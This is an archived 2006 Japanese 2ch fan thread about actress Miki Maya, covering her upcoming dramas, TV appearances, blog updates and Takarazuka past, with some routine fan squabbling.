147 :名無しさん@お腹いっぱい。:2006/12/09(土) 08:38:37 ID:V1Ic94ja
いえいえ、きっと番宣で何かしら出るでしょう。
わかんないけどそう期待しようよ〜。
いいともクリスマス号とかさ。

148 :名無しさん@お腹いっぱい。:2006/12/09(土) 13:56:55 ID:/giuGnWi
ドストライクにちがいない

149 :名無しさん@お腹いっぱい。:2006/12/09(土) 15:20:44 ID:01pBGJaw
いいともクリスマス特大号には、いいともレギュラー陣しか出ないよ。
フジ新番組の番宣兼ねて芸能人チームが出るのは春と秋の祭典だけ。
年内はもう無理っぽい。

150 :名無しさん@お腹いっぱい。:2006/12/10(日) 09:17:53 ID:M9ipyM7L
釈タンとみきタン俺の為のドラマだ。


151 :名無しさん@お腹いっぱい。:2006/12/10(日) 17:12:49 ID:8xW63jUg
釈じゃー数字取れねーだろな。
みきさんで2%上がっても、釈で3%下がる。

152 :名無しさん@お腹いっぱい。:2006/12/11(月) 17:39:24 ID:2OYhLeHj
冬ドラマは割と数字取りやすいけどこのドラマが2年前の
同じ枠のあのドラマ数字の再来にならんことを願う


153 :名無しさん@お腹いっぱい。:2006/12/11(月) 18:00:22 ID:HELJCW5f
見ざる聞かざるか

それもまた生き方の一つだからね

154 :名無しさん@お腹いっぱい。:2006/12/11(月) 18:16:29 ID:awZ7qFA8
>>152
何のドラマだっけ?
ヒミツは今やってるのとがらっと雰囲気かわりそうだよね。コメディらしいし。
火曜10時ここんとこ好調みたいだけど今度のは厳しそうだ。
でもみき切れ状態なんで何でもありがたいかも。

155 :名無しさん@お腹いっぱい。:2006/12/12(火) 00:54:53 ID:GaH7vxQ1
みきさんを見れれば良いんで、視聴率は どうでもいい。
アテプリが1番楽しみ♪♪

156 :名無しさん@お腹いっぱい。:2006/12/12(火) 01:48:16 ID:ROqDcHak
公式にヒミツの花園撮影中?のゴージャスなみきさんがアップされてるよ。
髪はウエーブで華やかな印象。こんなかんじでいくのかな?楽しみだね。

157 :名無しさん@お腹いっぱい。:2006/12/12(火) 07:51:49 ID:Bpy4s9uP
めざましテレビでアテプリの情報が。
上戸彩がフラダンス踊ってる隣で、みきさんも踊っていた。

158 :名無しさん@お腹いっぱい。:2006/12/12(火) 07:56:21 ID:2DP8tNb9
さっきめざましでフラダンスするみきがうつったべ。
アテプリのハワイロケ。みきやせたな。

159 :名無しさん@お腹いっぱい。:2006/12/12(火) 08:16:04 ID:ROqDcHak
見た見た!赤い衣裳で踊ってたねー。めちゃ細かった。
フラダンスがストーリーにどう絡んでくるのかな?エンディング映像だったりして。
1月は楽しみがいっぱいで待ち遠しいよー。

160 :名無しさん@お腹いっぱい。:2006/12/12(火) 10:49:53 ID:xNZlbPDS
わー!!いつもめざまし見てるのに
今日に限ってみなかったー!!!
どんなだった?詳しく教えてーお願いー!

161 :名無しさん@お腹いっぱい。:2006/12/12(火) 11:39:39 ID:ROqDcHak
彩ちゃんと笛木さんと並んでフラダンスやってる映像だったよ。さすが手の動きが綺麗。
みきさんは髪おろして赤いムンムン?着てた。ちなみに彩ちゃんが黄色で麻生先輩が青。
腰から下が体にフィットしたようなデザインだったけど細かったよー。
ちらっと映ったの見ただけだから細かいところ違ってたらごめんね。
一瞬だったけど久々のみきさんに朝からちょっと興奮してしまった。

162 :名無しさん@お腹いっぱい。:2006/12/12(火) 13:43:05 ID:ft3DTzCI
ttp://kingeri.e-city.tv/movietop.html
ここに真矢さんの画像がある

163 :名無しさん@お腹いっぱい。:2006/12/12(火) 19:19:15 ID:+WJP7f8g
×はあるの?この人

164 :名無しさん@お腹いっぱい。:2006/12/12(火) 19:53:50 ID:ROqDcHak
>>160
またまた失礼!スタッフさんのブログに後ろ姿の写真がアップされてるよー。

165 :名無しさん@お腹いっぱい。:2006/12/13(水) 15:16:08 ID:f576uQq8
アテプリSPが大好評でシリーズ化するといいな
みきさん主役でいいよ

166 :名無しさん@お腹いっぱい。:2006/12/13(水) 20:55:13 ID:7u5gxGvQ
みきさん昨日は雪組ご観劇。
あ〜一度でいいからどこぞで遭遇してみたい。

167 :名無しさん@お腹いっぱい。:2006/12/13(水) 22:25:44 ID:9z8vC+uB
テレビびあによると来年のドラマ要くんとラブな関係になりそうみたい〜(*^_^*)

168 :名無しさん@お腹いっぱい。:2006/12/13(水) 22:29:51 ID:9ZCNqCOS
なんてドラマ?
ソースは?

169 :名無しさん@お腹いっぱい。:2006/12/13(水) 23:11:22 ID:CMhJZ+MA
ヒミツの花園

170 :名無しさん@お腹いっぱい。:2006/12/14(木) 00:17:21 ID:78af+J7Z
この疑惑って結局どうだったの?
http://tv7.2ch.net/test/read.cgi/actress/1164985085/

171 :名無しさん@お腹いっぱい。:2006/12/14(木) 01:36:24 ID:r53Nhtwx
スレチにつき伊東スレできけ

172 :名無しさん@お腹いっぱい。:2006/12/14(木) 09:04:42 ID:yR7BLZ+x
昨日テレビガイドとテレビジョン見たけどあんまり詳しくのってなかったから
テレビピアをチェックしてみるね。
みきさんも恋愛関係に関わってくるのかな?バツ彼みたくなりませんように。

173 :名無しさん@お腹いっぱい。:2006/12/14(木) 13:36:10 ID:AEvZZ7gY
要潤と激しいベロちゅう希望
みきさんのベロちゅうはバツ彼以来ない

174 :名無しさん@お腹いっぱい。:2006/12/14(木) 14:18:10 ID:by52hCtc
みきさん何気にキスシーン上手いよね

175 :名無しさん@お腹いっぱい。:2006/12/15(金) 00:02:40 ID:lzwFpMKc
霞夕子の後、なーんもネタがのーて、うpることもできん今日この頃
みきファンのみなさま、いかがお過ごしですか?
もうほんまにネタがのーてのーて、みき売り切れて感じ?
こうなりゃケータイユーザーのためにブログ画像うpすっぞ!オラすっぞ!
ttp://imepita.jp/20061214/861220
ttp://imepita.jp/20061214/861260
ttp://imepita.jp/20061214/861270
もうみんな見ただろのう。すまんのう。今度うpれるのは来年かの。
アテプリSPに新ドラ、楽しみだーね。

176 :名無しさん@お腹いっぱい。:2006/12/15(金) 00:08:07 ID:7JlOMOST
神様いつもありがとー(^_-)

177 :名無しさん@お腹いっぱい。:2006/12/15(金) 00:49:49 ID:gOVS+7AT
きゃぁ〜!ありがと♪
たまに現れる神様を私はいつも待ってたの☆

178 :名無しさん@お腹いっぱい。:2006/12/15(金) 07:37:02 ID:iZCGEvSD
やっぱカワエェなあ
この笑顔に弱いんだよ
癒されるね

179 :名無しさん@お腹いっぱい。:2006/12/15(金) 14:33:50 ID:WLRFaEbJ
>>175
1枚目の画像、新ドラマですね。なんてエレガントセレブなみきさん。
まだ見た目だけど、今までこんなキャラありそうでなかった。
これでコメディとは、みきファンにとって期待できそうですね。

180 :名無しさん@お腹いっぱい。:2006/12/15(金) 16:20:45 ID:w6mKF/OC
>>175
神様サマいつもありがとう。みきさん綺麗♪特にフラダンスの時のが好き。
前にスカステで演出家かスタッフか忘れたけど特集があって
宝塚で赤い衣裳が似合うといえば真矢みきって言ってたけどほんとそうだね。
衣裳に負けない華があるよ。あー早く見たいな♪

181 :名無しさん@お腹いっぱい。:2006/12/15(金) 19:59:40 ID:DB1FCWYV
赤もレッドキラーとかで話題になったけど、
グリーン系の衣装も個人的に好きです。
やっぱ原色がいいのかなぁ


182 :名無しさん@お腹いっぱい。:2006/12/15(金) 20:55:26 ID:w6mKF/OC
うんうん。絶対淡い色よりパリッと原色の方が似合うと思う。
あと関係ないけどみきさんとジーンズこれは基本だね。

183 :名無しさん@お腹いっぱい。:2006/12/15(金) 22:19:34 ID:gOVS+7AT
何でも普通に着こなしちゃうもんね〜

184 :名無しさん@お腹いっぱい。:2006/12/17(日) 00:37:10 ID:NudO8PAf
ハーゲンダッツの新CMストロベリーのナレーションの声が
みきさんに聞こえるんだけど…

185 :名無しさん@お腹いっぱい。:2006/12/17(日) 00:52:19 ID:Bk/5EfyX
以前クッキーチョコレートとストロベリーのナレーションはやってるよ。
ストロベリーならみきさんだと思うけど。前と同じのかな?それとも新作?
どっちにしても声だけでみきさんと分かるなんて素晴らしい!
みきさんの声ってセクシーで素敵だもんね。

186 :名無しさん@お腹いっぱい。:2006/12/17(日) 10:44:28 ID:A3tErDFX
そうだねぇ。
昔は男役だったけど女役やってもオカマっぽくみえなかったし、
いい声だったし、他の男役の人にくらべて腕出すドレス多かったよね。

187 :名無しさん@お腹いっぱい。:2006/12/17(日) 14:05:25 ID:8v3tSV43
卵顔だから男っぽく見えないんだね

188 :名無しさん@お腹いっぱい。:2006/12/17(日) 16:45:49 ID:92Bf6HD6
みきさんって当時のトップさんの中でも、1番人気ある人だったの?

189 :名無しさん@お腹いっぱい。:2006/12/17(日) 17:53:08 ID:Bk/5EfyX
私はみきさんの現役時代は知らないし宝塚のことも詳しくないから一番とか分からないけど
宝塚の人が武道館でコンサートってすごいことなんでしょ?
みきさんはそれを三回成功させたらしいからかなり人気があったんじゃないかな。
ジャニーズみたいだよね。そのビデオは持ってないから手に入れば見てみたい。
話かわるけどたった今ハーゲンダッツのCM流れた〜。なんてタイムリー!
やっぱりみきさんだ!絶対録画しよ。

190 :名無しさん@お腹いっぱい。:2006/12/17(日) 20:35:50 ID:j5IYRizt
みきちゃんは同時期のトップスターのなかで人気動員力も一番でトッブオブザトップと言われてた。宝塚のキムタクとも当時マスコミに言われてたこともあった (笑)

191 :名無しさん@お腹いっぱい。:2006/12/17(日) 22:04:46 ID:9P0wKsl0
そうだったね。
舞台化粧するとみんな綺麗になるけど
みきさんて元がきれいな顔立ちだから
どんな場面も絵になっていた。

192 :名無しさん@お腹いっぱい。:2006/12/17(日) 23:44:15 ID:92Bf6HD6
マジっすかぁ〜。かなり人気だったんだねぇ〜。武道館でコンサートなんて確かに凄いよね!
「宝塚の革命児」とか言われてたみたいだよね。
いやぁ〜、ホントみきさんて素敵!!!

193 :名無しさん@お腹いっぱい。:2006/12/17(日) 23:53:51 ID:3f64YhgF
それに比べて、紫吹淳ときたら・・・ブサすぎ。
みきさんとレベルが違いすぎる。

194 :名無しさん@お腹いっぱい。:2006/12/18(月) 07:13:04 ID:RFpJDVY9
また、わっかりやすいのきたな

195 :名無しさん@お腹いっぱい。:2006/12/18(月) 22:49:24 ID:k8P07oYA
1月13日は真矢みき(アテプリSP)vs天海祐希(演歌の女王)

テレ朝は帝王、船越栄一郎

196 :名無しさん@お腹いっぱい。:2006/12/18(月) 22:50:17 ID:k8P07oYA
訂正

英一郎

197 :名無しさん@お腹いっぱい。:2006/12/19(火) 07:50:23 ID:2QPSEtsl
僕の歩く道最終回か
予告流れるかの

198 :名無しさん@お腹いっぱい。:2006/12/19(火) 11:33:42 ID:f3Yp5ZhK
天海なんかに負けるな!

199 :名無しさん@お腹いっぱい。:2006/12/19(火) 12:59:08 ID:xJ6RG3K3
ミキさん、クリスマスの生放送に出るんだね!

200 :名無しさん@お腹いっぱい。:2006/12/19(火) 16:49:18 ID:y1+Xeb1g
200みきさん

201 :名無しさん@お腹いっぱい。:2006/12/19(火) 17:24:15 ID:JiJPgpTu
>>199
何の番組?

202 :名無しさん@お腹いっぱい。:2006/12/19(火) 20:03:36 ID:5+VlxnFI
ねえ何

203 :名無しさん@お腹いっぱい。:2006/12/19(火) 20:29:13 ID:OeJ36Gwq
なになに?

204 :名無しさん@お腹いっぱい。:2006/12/19(火) 22:37:32 ID:4tVYHVUf
>>199はガセです。
年内はもうありません。

205 :名無しさん@お腹いっぱい。:2006/12/19(火) 23:00:01 ID:dL3FIp/8
あるとしたらニッポン放送のチャリティー・ミュージックソンへのサプライズ出演だね
http://www.1242.com/musicthon2006/

206 :名無しさん@お腹いっぱい。:2006/12/19(火) 23:11:20 ID:4tVYHVUf
ヒミツの花園予告キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

と思ったのも束の間

みきコネ━━━━━━('A`)━━━━━……‥ ‥
せっかく僕の歩く道録画してたのにorz

207 :名無しさん@お腹いっぱい。:2006/12/19(火) 23:28:08 ID:URAr184y
ブログ更新全然こな〜い(`ε´)

208 :名無しさん@お腹いっぱい。:2006/12/20(水) 08:02:25 ID:tHgpyf0z
みきサン忙しいのかなぁ?

209 :名無しさん@お腹いっぱい。:2006/12/20(水) 13:49:00 ID:kasVXpUC
12月25日のフジテレビの夜7時からの特番(名前忘れたけど)に出るらしいよー
世界の絶景ナントカってやつ

210 :名無しさん@お腹いっぱい。:2006/12/20(水) 15:05:45 ID:RdWPK0RR
>>199さん
>>209さん
情報ありがとう
http://www.fujitv.co.jp/b_hp/zekkei100/

■スタジオゲスト
橋田壽賀子
泉 ピン子
船越英一郎
真矢みき
さまぁ〜ず


211 :名無しさん@お腹いっぱい。:2006/12/20(水) 18:07:37 ID:4Ijq+vN8
渋〜いゲストw


212 :名無しさん@お腹いっぱい。:2006/12/20(水) 18:51:04 ID:iG5RQbxS
今年の正月番組でみきさんが食べてたチョコと同じのゲットしました。
明日来るで買えましたよ!

213 :名無しさん@お腹いっぱい。:2006/12/20(水) 21:01:43 ID:4Ijq+vN8
ハルカと食べてたトリノのチョコだよね。あれおいしそうだった。
あれから早一年、みきさん追っかけてるとあっという間だったなぁ。
そういやみきさん年末の紅白から元旦〜とテレビ出っぱなしだったんだ!

214 :名無しさん@お腹いっぱい。:2006/12/20(水) 21:32:40 ID:4Aoo2wuI
>>210
スタジオゲストのメンツが濃すぎw

215 :名無しさん@お腹いっぱい。:2006/12/20(水) 22:13:23 ID:o/y9S4Nh
ピン子との爆笑トークを希望します

216 :名無しさん@お腹いっぱい。:2006/12/20(水) 22:19:55 ID:ZvWmAAM0
みきさんは番宣に来てるだけだからね

217 :名無しさん@お腹いっぱい。:2006/12/20(水) 22:19:57 ID:/2B2gyF3
ピン子に虐められないように気をつけてね

218 :名無しさん@お腹いっぱい。:2006/12/21(木) 01:27:11 ID:+LBroApx
アテプリ再放送(関東地区)

1/05(金) 15:00-16:55
1/08(月) 14:35-16:30
1/09(火) 15:00-16:55
1/10(水) 15:00-16:55
1/11(木) 15:00-16:55
1/12(金) 15:58-16:55

219 :名無しさん@お腹いっぱい。:2006/12/21(木) 21:21:43 ID:sh49pARK
関東だけかあ。残念。

220 :名無しさん@お腹いっぱい。:2006/12/21(木) 23:09:01 ID:QhBE36Vz
ブログ、更新されてるぞいっ!

221 :名無しさん@お腹いっぱい。:2006/12/21(木) 23:34:00 ID:sh49pARK
おっ、サンキュー。

222 :名無しさん@お腹いっぱい。:2006/12/22(金) 00:05:41 ID:J32Uat4W
みきさんのフラダンスシーンが最大の見せ場だからね

223 :名無しさん@お腹いっぱい。:2006/12/22(金) 00:16:20 ID:R5nzZ8Fg
みきちゃん出演情報

【テレビ】
●12/24(日)19:00〜20:54 フジテレビ系「世界の絶景100選」
ゲスト出演!生放送
●12/31(日)12:30〜13:55 テレビ東京系「京都・もうひとつの歴史」
ナレーションを担当
●1/13(土)21:00〜 フジテレビ系「アテンションプリーズSP」
●1月スタート フジテレビ系連続ドラマ「ヒミツの花園(仮)」
(火曜22:00〜・初回1/9)

●2/4(日)15:00〜16:25 日本テレビ系「いのち〜永遠への道〜」

【イベント】
●2/10(土) 11:00〜/14:00〜 VENUSイベント
「MIKI MAYA BIRTHDAY PARTY!2007」


224 :名無しさん@お腹いっぱい。:2006/12/22(金) 00:34:11 ID:LXZQfgh8
42のみきをみきちゃん言ってるのは何歳や?w

檀れいスレでみきと檀が美人って事で一緒にされてるよ
あんな、地味で美人でもなく男から見たら匂わないのと一緒にされたくないよな

225 :名無しさん@お腹いっぱい。:2006/12/22(金) 00:42:22 ID:J32Uat4W
同性を「ちゃん」付けで呼ぶのは親しみを強く感じているからでしょう

226 :名無しさん@お腹いっぱい。:2006/12/22(金) 01:00:58 ID:EbnjldDX
>>224
あんたわざとらしいね。で、誰のヲタで?両人のアンチかな。
静かに応援するってことできないのかい?煽って楽しい?
あんたがみきの名で煽ろうが勝手だけど此見よがしにみきスレに来んでよろしい。

227 :名無しさん@お腹いっぱい。:2006/12/22(金) 07:19:33 ID:qR6sncnK
年明けの番宣出演はなしか。
今回はボーリングらしいんで別にいいか。

228 :名無しさん@お腹いっぱい。:2006/12/22(金) 10:04:35 ID:KpdSj7M+
ボーリング出るよ

229 :名無しさん@お腹いっぱい。:2006/12/22(金) 10:31:23 ID:Yp2CVKL+
なに、ボーリングやるのみきさんが?


230 :名無しさん@お腹いっぱい。:2006/12/22(金) 10:58:05 ID:jhvsrKjJ
この人の宝塚退団直後のインタビューでの
写真びっくりするほどきれいだった。


231 :名無しさん@お腹いっぱい。:2006/12/22(金) 12:24:36 ID:yb0xvSOz
あの頃より今の方がよっぽど綺麗なんだが。

232 :名無しさん@お腹いっぱい。:2006/12/23(土) 00:36:33 ID:xiJswgFf
>226
来るも来ないもずっと、このスレでみきの匂う尻無いかなと読んでるがな前から

檀れいなんて言う色物、突然最近知ったがな
おまえに何の権限が有って来るな言えるんやw
池沼?

233 :名無しさん@お腹いっぱい。:2006/12/23(土) 00:53:17 ID:Dj+Eb/4G
ブログ、みきをみきちゃん綺麗!

234 :名無しさん@お腹いっぱい。:2006/12/23(土) 11:21:37 ID:sy60XMX5
明日のフジテレビ絶景100選では松坂慶子、内田恭子のハワイ島フラダンス修行の模様を放送

235 :名無しさん@お腹いっぱい。:2006/12/23(土) 11:31:39 ID:UO5rbzyM
>>234
おおっ!それはぜひ見たい!

236 :名無しさん@お腹いっぱい。:2006/12/23(土) 11:41:45 ID:UO5rbzyM
ヒミツの花園公式サイトオープン
まだコンテンツ少ないです。
めっちゃ小さいですが、みきさんと釈由美子さんのシーンショットが
1つだけありました。
この番組、関西テレビ制作なんですね。
コメディでみきさんと寺島進さんのカラミが見れるとは、こりゃ楽しみ。
ttp://www.ktv.co.jp/hanazono/index.html

237 :名無しさん@お腹いっぱい。:2006/12/23(土) 12:18:46 ID:sy60XMX5
世界の絶景100選 豪華芸能人が命がけでボロ泣き感動絶景SP!
http://wwwz.fujitv.co.jp/zekkei100/index2.html

238 :名無しさん@お腹いっぱい。:2006/12/23(土) 12:58:16 ID:O8krO2R8
クリスマスに制作発表なんだね。みきさん出席するかな?
一応めざましとか録画しとこう。

239 :名無しさん@お腹いっぱい。:2006/12/23(土) 13:31:58 ID:Dj+Eb/4G
するよ

240 :名無しさん@お腹いっぱい。:2006/12/23(土) 18:51:56 ID:MA3l+pJT
アテプリの番組サイトが更新されましたね
http://wwwz.fujitv.co.jp/AP/index2.html

241 :名無しさん@お腹いっぱい。:2006/12/24(日) 19:21:19 ID:RC2+VNXN
やっぱりほとんど映らん。
スタジオゲストの時は期待できん。

242 :名無しさん@お腹いっぱい。:2006/12/24(日) 20:25:26 ID:3sXx0JW7
つまらん…
ナイナイ見よ

243 :ホロリ:2006/12/24(日) 20:28:35 ID:5qYYq9oD
自分みきさん大好き♪同性なんだけど、何故かドキドキ(◎o◎)
絶景100見てるけど、やっぱり綺麗だな〜
恋しました。

244 :名無しさん@お腹いっぱい。:2006/12/24(日) 21:38:29 ID:aP8depLW
アロハの心にほれた。
ほんと表現の仕方に惚れる。
たまらん人です、私は女ですがきっと共感してくれる女性がいると
信じてます。

245 :名無しさん@お腹いっぱい。:2006/12/24(日) 22:46:46 ID:ZYfkaDi5
絶景、明日だと思ってたら、今日だったのか(+_+) 見逃した(;_;) どなたか服装とかコメントとか教えてください。

246 :名無しさん@お腹いっぱい。:2006/12/25(月) 04:57:08 ID:pMOFelbn
船越英一郎さんとペアでした
とてもお綺麗でしたよ

247 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:02:44 ID:HW6tfy4q
みきさんブログ更新してるよ!
かわいいクリスマスプレゼント☆
MerryChristmas!

248 :名無しさん@お腹いっぱい。:2006/12/25(月) 19:07:27 ID:216HnYN9
画像を左クリックすると大きいのが見られますね

249 :名無しさん@お腹いっぱい。:2006/12/26(火) 21:44:29 ID:ouykNj2+
ヒミツの花園キャストに顔写真が入ったよ
http://www.ktv.co.jp/hanazono/cast/index.html

今日のブス恋終わったら予告あるかな?

250 :名無しさん@お腹いっぱい。:2006/12/27(水) 10:59:54 ID:WjWc1V3Z
ベルサイユの薔薇っぽいね

251 :名無しさん@お腹いっぱい。:2006/12/27(水) 11:03:44 ID:WjWc1V3Z
訂正

ベルサイユのばら

252 :名無しさん@お腹いっぱい。:2006/12/27(水) 14:13:12 ID:pUUk7Wmf
スマコンにまた出るんだね。
仮面レンアイダーではありませんようにw

253 :名無しさん@お腹いっぱい。:2006/12/27(水) 14:34:47 ID:CF9zglbI
元旦のSPのこと?

254 :名無しさん@お腹いっぱい。:2006/12/27(水) 18:19:57 ID:pUUk7Wmf
元旦じゃない。

255 :名無しさん@お腹いっぱい。:2006/12/27(水) 18:39:03 ID:MX0VkDSX
レンアイダーは変身後の衣裳にポカーンだったw
変身のきめポーズはかっこよかった。

256 :名無しさん@お腹いっぱい。:2006/12/27(水) 22:23:44 ID:Ui1XMs/w
いいともテレフォンゲスト1年分紹介中。
みきさんは6月6日出演。もうすぐ!
たぶん地図話だろな。

257 :名無しさん@お腹いっぱい。:2006/12/27(水) 22:34:50 ID:Ui1XMs/w
活断層大好物です!話だった

258 :名無しさん@お腹いっぱい。:2006/12/27(水) 22:59:45 ID:zj+PF704
オレはみきさんが大好物です

259 :名無しさん@お腹いっぱい。:2006/12/27(水) 23:07:01 ID:ENEFBu5P
>255
レンアイダーやる前に番組スタッフから「顔のサイズ教えて下さい」って聞かれたとか(w
まさかその時はあんな衣装になるとは露知らず・・
アレをやりきった(しかも楽しそうに)みきさんに拍手だね〜(w

260 :名無しさん@お腹いっぱい。:2006/12/27(水) 23:23:30 ID:MX0VkDSX
顔のサイズってwそんな裏話があったんだ…。
みきさんノリノリだったね。だからちゃんと目をそらさずに見たw
あの歳で(ごめん、みきさん)よくやった!っておもたよ。

261 :名無しさん@お腹いっぱい。:2006/12/27(水) 23:53:46 ID:WZSh0e8h
かぶりものw

262 :名無しさん@お腹いっぱい。:2006/12/28(木) 00:54:35 ID:emKnArmV
1/15(月)22:00〜22:54 フジテレビ系「SMAP×SMAP」コーナーゲストです!

1/13(土)21:00〜 フジテレビ系「アテンションプリーズSP」が放送決定!

1月スタート(火曜22:00〜、初回1/9) フジテレビ系連続ドラマ「ヒミツの花園」出演決定!

1/6(土)21:00〜22:54 フジテレビ系「中居正広のスーパーフェスティバル」新番組対抗ボーリング対決!生放送です!


1/5(金)〜(時間不定期)フジテレビ系「アテンションプリーズ」再放送

12/31(日)12:30〜13:55 テレビ東京系「京都・もうひとつの歴史」ナレーションを担当します!

263 :名無しさん@お腹いっぱい。:2006/12/28(木) 19:27:59 ID:Y6UYzwB5
今度はビストロかな?

264 :名無しさん@お腹いっぱい。:2006/12/28(木) 19:32:30 ID:e7oYq25Z
背中にピストロ
心に花束

265 :名無しさん@お腹いっぱい。:2006/12/28(木) 19:54:38 ID:SiZZ0aJO
ビストロならそう書いてるんじゃない?しかもずっと前にでてるし。

266 :名無しさん@お腹いっぱい。:2006/12/28(木) 21:35:23 ID:tW3s7QVe
スマスマのコーナーゲストと言えば、ビストロ、ルーレットボウリング、
スケートボーイズ・・・これぐらいかな。
ボウリングは正月SPで泉ピン子軍団とやるそうだし、スケートボーイズは
さすがに無いw
やっぱりビストロじゃねーか?最近、新ドラマ出演者は必ずビストロ出る。
しかし、仮面レンアイダーやってほしいわーw

267 :名無しさん@お腹いっぱい。:2006/12/28(木) 22:34:33 ID:EXGv7V8E
コントが好きだけど、ゲスト参加タイプのゲームもいろいろあった記憶が。スポーツ、ゲームから粘土の王国までw
新しい企画かもしれないな。

268 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:28:17 ID:0Gfp3Qtl
ttp://www.youtube.com/watch?v=fJeV4YyEW8o&mode=related&search=
ttp://www.youtube.com/watch?v=dvQIWpKLHy0&mode=related&search=
ttp://www.youtube.com/watch?v=kCi5c6dxj8E&mode=related&search=
ttp://www.youtube.com/watch?v=gcZeWQCjcHg

懐かしいみきちゃんの歌声と映像!
声が今と全然違うw

269 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:49:06 ID:0Gfp3Qtl
ttp://www.youtube.com/watch?v=CQzoprOzxPk&mode=related&search=
ttp://www.youtube.com/watch?v=9SlrhQIFMvM&mode=related&search=
ttp://www.youtube.com/watch?v=Me1kkjwNRD4&mode=related&search=

まだあった。

270 :名無しさん@お腹いっぱい。:2006/12/29(金) 20:58:47 ID:/tiG3/md
みきさんて低い男声はもうでないの?

50 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)